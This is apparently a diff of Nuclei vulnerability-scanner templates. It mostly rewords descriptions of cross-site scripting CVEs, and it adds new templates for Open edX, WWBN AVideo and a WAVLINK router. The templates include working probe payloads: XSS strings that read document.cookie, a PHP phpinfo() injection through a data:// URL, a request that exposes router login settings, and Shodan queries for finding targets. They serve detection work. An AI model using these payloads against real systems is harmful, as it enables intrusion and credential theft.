    9 9   - https://github.com/RobertDra/CVE-2021-31862/blob/main/README.md
     10 + - https://www.sysaid.com/product/on-premise/latest-release
    10 11   - https://nvd.nist.gov/vuln/detail/CVE-2021-31862
    11  - - https://www.sysaid.com/product/on-premise/latest-release
    12 12   classification:
    13 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 14   cvss-score: 6.1
    skipped 13 lines
    28 28   - '(body == "false <script>alert(document.domain)</script>")'
    29 29   - 'status_code == 200'
    30 30   condition: and
     31 + 
     32 +# Enhanced by mp on 2022/08/28
     33 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-32853.yaml
    1 1  id: CVE-2021-32853
    2 2   
    3 3  info:
    4  - name: Erxes <= v0.23.0 XSS
     4 + name: Erxes <0.23.0 - Cross-Site Scripting
    5 5   author: dwisiswant0
    6 6   severity: medium
    7  - description: Erxes prior to version 0.23.0 is vulnerable to cross-site scripting.The value of topicID parameter is not escaped & triggered in the enclosing script tag.
     7 + description: Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag.
    8 8   reference:
    9 9   - https://securitylab.github.com/advisories/GHSL-2021-103-erxes/
    10 10   - https://nvd.nist.gov/vuln/detail/CVE-2021-3285
    skipped 26 lines
    37 37   status:
    38 38   - 200
    39 39   
     40 +# Enhanced by mp on 2022/08/28
     41 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-33904.yaml
    1 1  id: CVE-2021-33904
    2 2   
    3 3  info:
    4  - name: Accela Civic Platform 21.1 - 'servProvCode' XSS
     4 + name: Accela Civic Platform <=21.1 - Cross-Site Scripting
    5 5   author: geeknik
    6 6   severity: medium
    7  - description: In Accela Civic Platform through 21.1, the security/hostSignon.do parameter servProvCode is vulnerable to XSS.
     7 + description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via the security/hostSignon.do parameter servProvCode.
    8 8   reference:
    9 9   - https://www.exploit-db.com/exploits/49980
    10 10   - https://gist.github.com/0xx7/3d934939d7122fe23db11bc48eda9d21
    11 11   - http://packetstormsecurity.com/files/163093/Accela-Civic-Platorm-21.1-Cross-Site-Scripting.html
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-33904
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 6.1
    skipped 22 lines
    37 38   - type: status
    38 39   status:
    39 40   - 200
     41 + 
     42 +# Enhanced by mp on 2022/08/28
     43 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-34370.yaml
    1 1  id: CVE-2021-34370
    2 2   
    3 3  info:
    4  - name: Accela Civic Platform 21.1 - Open Redirect & XSS
     4 + name: Accela Civic Platform <=21.1 - Cross-Site Scripting
    5 5   author: 0x_Akoko
    6 6   severity: medium
    7  - description: Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1
     7 + description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via ssoAdapter/logoutAction.do successURL.
    8 8   reference:
    9 9   - https://www.exploit-db.com/exploits/49990
    10  - - https://nvd.nist.gov/vuln/detail/CVE-2021-34370
    11 10   - https://www.accela.com/civic-platform/
    12 11   - https://gist.github.com/0xx7/7e9f1b725f7ff98b9239d3cb027b7dc8
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-34370
    13 13   classification:
    14 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 15   cvss-score: 6.1
    skipped 12 lines
    28 28   - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
    29 29   part: header
    30 30   
     31 +# Enhanced by mp on 2022/08/28
     32 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-34640.yaml
    1 1  id: CVE-2021-34640
    2 2   
    3 3  info:
    4  - name: Securimage-WP-Fixed <= 3.5.4 - Reflected Cross-Site Scripting (XSS)
     4 + name: WordPress Securimage-WP-Fixed <=3.5.4 - Cross-Site Scripting
    5 5   author: dhiyaneshDK
    6 6   severity: medium
    7  - description: The Securimage-WP-Fixed WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.5.4.
     7 + description: WordPress Securimage-WP-Fixed plugin 3.5.4 and prior contains a cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file, which allows attackers to inject arbitrary web scripts.
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2
    10  - - https://nvd.nist.gov/vuln/detail/CVE-2021-34640
    11 10   - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34640
    12 11   - https://plugins.trac.wordpress.org/browser/securimage-wp-fixed/trunk/securimage-wp.php#L628
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-34640
    13 13   classification:
    14 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 15   cvss-score: 6.1
    skipped 33 lines
    49 49   words:
    50 50   - "text/html"
    51 51   
     52 +# Enhanced by mp on 2022/08/28
     53 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-34643.yaml
    1 1  id: CVE-2021-34643
    2 2   
    3 3  info:
    4  - name: Skaut bazar < 1.3.3 - Reflected Cross-Site Scripting
     4 + name: WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting
    5 5   author: dhiyaneshDK
    6 6   severity: medium
    7  - description: The Skaut bazar WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.3.2.
     7 + description: WordPress Skaut Bazar plugin before 1.3.3 contains a reflected cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file, which allows attackers to inject arbitrary web scripts.
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a
    10  - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34643
    11 10   - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34643
    12 11   - https://plugins.trac.wordpress.org/browser/skaut-bazar/tags/1.3.2/skaut-bazar.php#L657
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-34643
    13 13   classification:
    14 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 15   cvss-score: 6.1
    skipped 33 lines
    49 49   words:
    50 50   - "text/html"
    51 51   
     52 +# Enhanced by mp on 2022/08/28
     53 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-36450.yaml
    1 1  id: CVE-2021-36450
    2 2   
    3 3  info:
    4  - name: Verint 15.2 - Cross Site Scripting
     4 + name: Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting
    5 5   author: atomiczsec
    6 6   severity: medium
    7  - description: Verint Workforce Optimization (WFO) 15.2.8.10048 allows XSS via the control/my_notifications NEWUINAV parameter.
     7 + description: Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter.
    8 8   reference:
    9 9   - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740
    10 10   - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html
    11  - - https://nvd.nist.gov/vuln/detail/CVE-2021-36450
    12 11   - http://verint.com
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-36450
    13 13   classification:
    14 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 15   cvss-score: 6.1
    skipped 46 lines
    62 62   status:
    63 63   - 200
    64 64   
     65 +# Enhanced by mp on 2022/08/28
     66 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-37216.yaml
    1 1  id: CVE-2021-37216
    2 2   
    3 3  info:
    4  - name: QSAN Storage Manager prior to v3.3.3 Reflected XSS
     4 + name: QSAN Storage Manager <3.3.3 - Cross-Site Scripting
    5 5   author: dwisiswant0
    6 6   severity: medium
    7 7   description: |
    8  - QSAN Storage Manager header page parameters does not filter special characters.
    9  - Remote attackers can inject JavaScript without logging in and launch
    10  - reflected XSS attacks to access and modify specific data.
     8 + QSAN Storage Manager before 3.3.3 contains a reflected cross-site scripting vulnerability. Header page parameters do not filter special characters. Remote attackers can inject JavaScript to access and modify specific data.
    11 9   reference:
    12 10   - https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2021-37216
    13 12   classification:
    14 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 14   cvss-score: 6.1
    skipped 25 lines
    41 40   dsl:
    42 41   - "!contains(tolower(all_headers), 'x-xss-protection')"
    43 42   
     43 +# Enhanced by mp on 2022/08/28
     44 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-37416.yaml
    1 1  id: CVE-2021-37416
    2 2   
    3 3  info:
    4  - name: Zoho ManageEngine ADSelfService Plus - Reflected XSS
     4 + name: Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting
    5 5   author: edoardottt
    6 6   severity: medium
    7  - description: Zoho ManageEngine ADSelfService Plus version 6103 and prior is vulnerable to reflected XSS on the loadframe page.
     7 + description: Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.
     8 + reference:
     9 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416
     10 + - https://blog.stmcyber.com/vulns/cve-2021-37416/
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2021-37416
     12 + tags: cve,cve2021,zoho,xss
    8 13   classification:
    9 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    10 15   cvss-score: 6.1
    skipped 2 lines
    13 18   metadata:
    14 19   shodan-query: http.title:"ManageEngine"
    15 20   verified: true
    16  - reference:
    17  - - https://nvd.nist.gov/vuln/detail/CVE-2021-37416
    18  - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416
    19  - - https://blog.stmcyber.com/vulns/cve-2021-37416/
    20  - tags: cve,cve2021,zoho,xss
    21 21   
    22 22  requests:
    23 23   - method: GET
    skipped 17 lines
    41 41   - "></iframe><script>alert(1)</script>"
    42 42   - "adsf/js/"
    43 43   condition: and
     44 + 
     45 +# Enhanced by mp on 2022/08/28
     46 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-37833.yaml
    1 1  id: CVE-2021-37833
    2 2   
    3 3  info:
    4  - name: Hotel Druid 3.0.2 XSS
     4 + name: Hotel Druid 3.0.2 - Cross-Site Scripting
    5 5   author: pikpikcu
    6 6   severity: medium
    7  - description: Reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands.
     7 + description: Hotel Druid 3.0.2 contains a cross-site scripting vulnerability in multiple pages which allows for arbitrary execution of JavaScript commands.
    8 8   reference:
    9 9   - https://github.com/dievus/CVE-2021-37833
     10 + - https://www.hoteldruid.com
    10 11   - https://nvd.nist.gov/vuln/detail/CVE-2021-37833
    11  - - https://www.hoteldruid.com
    12 12   classification:
    13 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 14   cvss-score: 6.1
    skipped 27 lines
    42 42   status:
    43 43   - 200
    44 44   
     45 +# Enhanced by mp on 2022/08/28
     46 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-42063.yaml
    1 1  id: CVE-2021-42063
    2 2   
    3 3  info:
    4  - name: SAP Knowledge Warehouse (KW) - Reflected XSS
     4 + name: SAP Knowledge Warehouse <=7.5.0 - Cross-Site Scripting
    5 5   author: pdteam
    6 6   severity: medium
    7 7   description: |
    8  - A security vulnerability has been discovered in the SAP Knowledge Warehouse - versions 7.30, 7.31, 7.40, 7.50. The usage of one SAP KW component within a Web browser enables unauthorized attackers to conduct XSS attacks, which might lead to disclose sensitive data.
     8 + SAP Knowledge Warehouse 7.30, 7.31, 7.40, and 7.50 contain a reflected cross-site scripting vulnerability via the usage of one SAP KW component within a web browser.
    9 9   reference:
    10 10   - https://seclists.org/fulldisclosure/2022/Mar/32
    11 11   - https://packetstormsecurity.com/files/166369/SAP-Knowledge-Warehouse-7.50-7.40-7.31-7.30-Cross-Site-Scripting.html
    skipped 31 lines
    43 43   - type: status
    44 44   status:
    45 45   - 200
     46 + 
     47 +# Enhanced by mp on 2022/08/28
     48 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-45422.yaml
    1 1  id: CVE-2021-45422
    2 2   
    3 3  info:
    4  - name: Reprise License Manager 14.2 - Reflected XSS
     4 + name: Reprise License Manager 14.2 - Cross-Site Scripting
    5 5   author: edoardottt
    6 6   severity: medium
    7 7   description: |
    8  - Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability in the /goform/activate_process "count" parameter via GET. No authentication is required.
     8 + Reprise License Manager 14.2 contains a cross-site scripting vulnerability in the /goform/activate_process "count" parameter via GET.
    9 9   reference:
    10 10   - https://seclists.org/fulldisclosure/2022/Jan/31
    11 11   - https://www.getinfosec.news/13202933/reprise-license-manager-142-reflected-cross-site-scripting#/
    skipped 31 lines
    43 43   status:
    44 44   - 200
    45 45   
     46 +# Enhanced by mp on 2022/08/28
     47 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-46387.yaml
    skipped 3 lines
    4 4   name: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting
    5 5   author: DhiyaneshDk
    6 6   severity: medium
    7  - description: ZyXEL ZyWALL 2 Plus Internet Security Appliance is affected by Cross Site Scripting (XSS). Insecure URI handling leads to bypass security restriction to achieve Cross Site Scripting, which allows an attacker able to execute arbitrary JavaScript codes to perform multiple attacks such as clipboard hijacking and session hijacking.
     7 + description: ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks.
    8 8   reference:
    9 9   - https://www.exploit-db.com/exploits/50797
    10  - - https://nvd.nist.gov/vuln/detail/CVE-2021-46387
    11 10   - https://www.zyxel.com/us/en/support/security_advisories.shtml
    12 11   - https://drive.google.com/drive/folders/1_XfWBLqxT2Mqt7uB663Sjlc62pE8-rcN?usp=sharing
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-46387
    13 13   classification:
    14 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 15   cvss-score: 6.1
    skipped 26 lines
    42 42   status:
    43 43   - 200
    44 44   
     45 +# Enhanced by mp on 2022/08/28
     46 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-0140.yaml
    1 1  id: CVE-2022-0140
    2 2   
    3 3  info:
    4  - name: WordPress Visual Form Builder < 3.0.6 - Unauthenticated Information Disclosure
     4 + name: WordPress Visual Form Builder <3.0.8 - Cross-Site Scripting
    5 5   author: random-robbie
    6 6   severity: medium
    7 7   description: |
    8  - Visual Form Builder < 3.0.6 - Unauthenticated Information Disclosure. The plugin does not perform access control on entry form export, allowing unauthenticated users to see the form entries or export it as a CSV File using the vfb-export endpoint.
     8 + WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.
    9 9   reference:
    10 10   - https://wpscan.com/vulnerability/9fa2b3b6-2fe3-40f0-8f71-371dd58fe336
    11 11   - https://www.fortiguard.com/zeroday/FG-VD-21-082
     12 + - https://nvd.nist.gov/vuln/detail/cve-2022-0140
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    14 15   cvss-score: 5.3
    skipped 23 lines
    38 39   - type: status
    39 40   status:
    40 41   - 200
     42 + 
     43 +# Enhanced by mp on 2022/08/28
     44 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-0148.yaml
    1 1  id: CVE-2022-0148
    2 2   
    3 3  info:
    4  - name: All-in-one Floating Contact Form < 2.0.4 - Authenticated Reflected XSS
     4 + name: WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting
    5 5   author: DhiyaneshDK
    6 6   severity: medium
    7  - description: The plugin was vulnerable to reflected XSS on the my-sticky-elements-leads admin page.
     7 + description: WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page.
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/37665ee1-c57f-4445-9596-df4f7d72c8cd
    10 10   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0148
    11 11   - https://plugins.trac.wordpress.org/changeset/2654453/mystickyelements
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0148
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 5.4
    skipped 33 lines
    48 49   status:
    49 50   - 200
    50 51   
     52 +# Enhanced by mp on 2022/08/28
     53 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-0346.yaml
    1 1  id: CVE-2022-0346
    2 2   
    3 3  info:
    4  - name: Google XML Sitemap Generator < 2.0.4 - Reflected Cross-Site Scripting & RCE
     4 + name: Google XML Sitemap Generator < 2.0.4 - Cross-Site Scripting & RCE
    5 5   author: Akincibor
    6 6   severity: medium
    7 7   description: |
    skipped 8 lines
    16 16   cve-id: CVE-2022-0346
    17 17   cwe-id: CWE-79
    18 18   metadata:
    19  - verified: "true"
    20  - tags: xss,wp,wordpress,wp-plugin,cve,cve2022,wpscan
     19 + verified: true
     20 + tags: cve,cve2022,xss,wp,wordpress,wp-plugin,wpscan
    21 21   
    22 22  requests:
    23 23   - method: GET
    skipped 1 lines
    25 25   - '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
    26 26   - '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
    27 27   
     28 + stop-at-first-match: true
    28 29   req-condition: true
    29 30   matchers-condition: and
    30 31   matchers:
    31 32   - type: dsl
    32 33   dsl:
    33 34   - "contains(body_1, 'PHP Extension') || contains(body_1, 'PHP Version')"
    34  - - "status_code==200 && contains(body_2, '<img src onerror=alert(document.domain)>') || contains(body_2, 'Invalid Renderer type specified')"
     35 + - "status_code==200 && contains(body_2, '<img src onerror=alert(document.domain)>') && contains(body_2, ' type specified')"
    35 36   condition: or
    36 37   
    37 38   - type: word
    skipped 11 lines
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-31269.yaml
    skipped 7 lines
    8 8   Admin credentials are stored in clear text at the endpoint /test.txt (This occurs in situations where the default credentials admin:admin have beenchanged.) Allows an unauthenticated attacker to obtain adminicredentials, access the admin dashboard of Linear eMerge E3-Series devices, control entire building doors, cameras, elevator, etc... and access information about employees who can access the building and take control of the entire building.
    9 9   reference:
    10 10   - https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html
     11 + - https://www.nortekcontrol.com/access-control/
    11 12   - https://nvd.nist.gov/vuln/detail/CVE-2022-31269
    12 13   - https://eg.linkedin.com/in/omar-1-hashem
    13  - - https://www.nortekcontrol.com/access-control/
     14 + classification:
     15 + cve-id: CVE-2022-31269
    14 16   metadata:
    15 17   shodan-query: http.title:"Linear eMerge"
    16 18   verified: "true"
    skipped 29 lines
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-31798.yaml
    skipped 9 lines
    10 10   - https://packetstormsecurity.com/files/167992/
    11 11   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31798
    12 12   - http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html
    13  - - https://eg.linkedin.com/in/omar-1-hashem
     13 + classification:
     14 + cve-id: CVE-2022-31798
    14 15   metadata:
    15 16   shodan-query: http.title:"eMerge"
    16 17   verified: "true"
    skipped 23 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-32159.yaml
     1 +id: CVE-2022-32159
     2 + 
     3 +info:
     4 + name: Open edX - Cross-site Scripting
     5 + author: arafatansari
     6 + severity: medium
     7 + description: |
     8 + Open edX platform before 2022-06-06 allows Reflected Cross-site Scripting via the "next" parameter in the logout URL.
     9 + reference:
     10 + - https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-32159
     12 + - https://www.mend.io/vulnerability-database/CVE-2022-32159
     13 + - https://github.com/internetarchive/infogami/pull/195/commits/ccc2141c5fb093870c9e2742c01336ecca8cd12e
     14 + classification:
     15 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
     16 + cvss-score: 5.4
     17 + cve-id: CVE-2022-32159
     18 + cwe-id: CWE-79
     19 + metadata:
     20 + comment: Hover the cursor on the redirect link
     21 + shodan-query: http.html:"Open edX"
     22 + verified: "true"
     23 + tags: cve,cve2022,openedx,xss
     24 + 
     25 +requests:
     26 + - method: GET
     27 + path:
     28 + - '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)'
     29 + 
     30 + matchers-condition: and
     31 + matchers:
     32 + - type: word
     33 + part: body
     34 + words:
     35 + - '<a href="+8"onmouseover="alert(document.domain)">click here to go to'
     36 + 
     37 + - type: word
     38 + part: header
     39 + words:
     40 + - text/html
     41 + 
     42 + - type: status
     43 + status:
     44 + - 200
     45 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-32770.yaml
     1 +id: CVE-2022-32770
     2 + 
     3 +info:
     4 + name: WWBN AVideo 11.6 - Cross Site Scripting
     5 + author: arafatansari
     6 + severity: medium
     7 + description: |
     8 + A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 via "toast" parameter which is inserted into the document with insufficient sanitization.
     9 + reference:
     10 + - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-32770
     12 + - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     15 + cvss-score: 6.1
     16 + cve-id: CVE-2022-32770
     17 + cwe-id: CWE-79
     18 + metadata:
     19 + shodan-query: http.html:"AVideo"
     20 + verified: "true"
     21 + tags: cve,cve2022,avideo,xss,wwbn
     22 + 
     23 +requests:
     24 + - method: GET
     25 + path:
     26 + - "{{BaseURL}}/index.php?toast=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
     27 + 
     28 + matchers-condition: and
     29 + matchers:
     30 + - type: word
     31 + part: body
     32 + words:
     33 + - 'text: "</script><script>alert(document.cookie);</script>'
     34 + 
     35 + - type: word
     36 + part: header
     37 + words:
     38 + - text/html
     39 + 
     40 + - type: status
     41 + status:
     42 + - 200
     43 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-32771.yaml
     1 +id: CVE-2022-32771
     2 + 
     3 +info:
     4 + name: WWBN AVideo 11.6 - Cross Site Scripting
     5 + author: arafatansari
     6 + severity: medium
     7 + description: |
     8 + A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 via "success" parameter which is inserted into the document with insufficient sanitization.
     9 + reference:
     10 + - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-32771
     12 + - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     15 + cvss-score: 6.1
     16 + cve-id: CVE-2022-32771
     17 + cwe-id: CWE-79
     18 + metadata:
     19 + shodan-query: http.html:"AVideo"
     20 + verified: "true"
     21 + tags: cve,cve2022,avideo,xss
     22 + 
     23 +requests:
     24 + - method: GET
     25 + path:
     26 + - "{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
     27 + 
     28 + matchers-condition: and
     29 + matchers:
     30 + - type: word
     31 + part: body
     32 + words:
     33 + - 'avideoAlertSuccess("</script><script>alert(document.cookie);</script>'
     34 + - 'text: "</script><script>alert(document.cookie);</script>'
     35 + condition: or
     36 + 
     37 + - type: word
     38 + part: header
     39 + words:
     40 + - text/html
     41 + 
     42 + - type: status
     43 + status:
     44 + - 200
     45 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-32772.yaml
     1 +id: CVE-2022-32772
     2 + 
     3 +info:
     4 + name: WWBN AVideo 11.6 - Cross Site Scripting
     5 + author: arafatansari
     6 + severity: medium
     7 + description: |
     8 + A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 via "msg" parameter which is inserted into the document with insufficient sanitization.
     9 + reference:
     10 + - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-32772
     12 + - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     15 + cvss-score: 6.1
     16 + cve-id: CVE-2022-32772
     17 + cwe-id: CWE-79
     18 + metadata:
     19 + shodan-query: http.html:"AVideo"
     20 + verified: "true"
     21 + tags: cve,cve2022,avideo,xss,wwbn
     22 + 
     23 +requests:
     24 + - method: GET
     25 + path:
     26 + - "{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
     27 + 
     28 + matchers-condition: and
     29 + matchers:
     30 + - type: word
     31 + part: body
     32 + words:
     33 + - 'avideoAlertInfo("</script><script>alert(document.cookie);</script>'
     34 + 
     35 + - type: word
     36 + part: header
     37 + words:
     38 + - text/html
     39 + 
     40 + - type: status
     41 + status:
     42 + - 200
     43 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-34576.yaml
     1 +id: CVE-2022-34576
     2 + 
     3 +info:
     4 + name: WAVLINK WN535 G3 - Access Control
     5 + author: arafatansari
     6 + severity: high
     7 + description: |
     8 + A vulnerability in /cgi-bin/ExportAllSettings.sh of WAVLINK WN535 G3 M35G3R.V5030.180927 allows attackers to execute arbitrary code via a crafted POST request.
     9 + reference:
     10 + - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3_Sensitive%20information%20leakage.md
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-34576
     12 + classification:
     13 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     14 + cvss-score: 7.5
     15 + cve-id: CVE-2022-34576
     16 + metadata:
     17 + shodan-query: http.html:"Wavlink"
     18 + verified: "true"
     19 + tags: cve,cve2022,wavlink,exposure
     20 + 
     21 +requests:
     22 + - method: GET
     23 + path:
     24 + - "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"
     25 + 
     26 + matchers-condition: and
     27 + matchers:
     28 + - type: word
     29 + words:
     30 + - 'Login='
     31 + - 'Password='
     32 + - 'Model='
     33 + - 'AuthMode='
     34 + condition: and
     35 + 
     36 + - type: status
     37 + status:
     38 + - 200
     39 + 
  • ■ ■ ■ ■
    config/nuclei-templates/default-logins/minio/minio-default-login.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: Minio Default Login
    5 5   author: pikpikcu
    6  - severity: medium
     6 + severity: high
    7 7   description: Minio default admin credentials were discovered.
    8 8   reference:
    9 9   - https://docs.min.io/docs/minio-quickstart-guide.html#
    skipped 43 lines
  • ■ ■ ■ ■
    config/nuclei-templates/default-logins/ofbiz/ofbiz-default-login.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: Apache OfBiz Default Login
    5 5   author: pdteam
    6  - severity: medium
     6 + severity: high
    7 7   description: Apache OfBiz default admin credentials were discovered.
    8 8   reference:
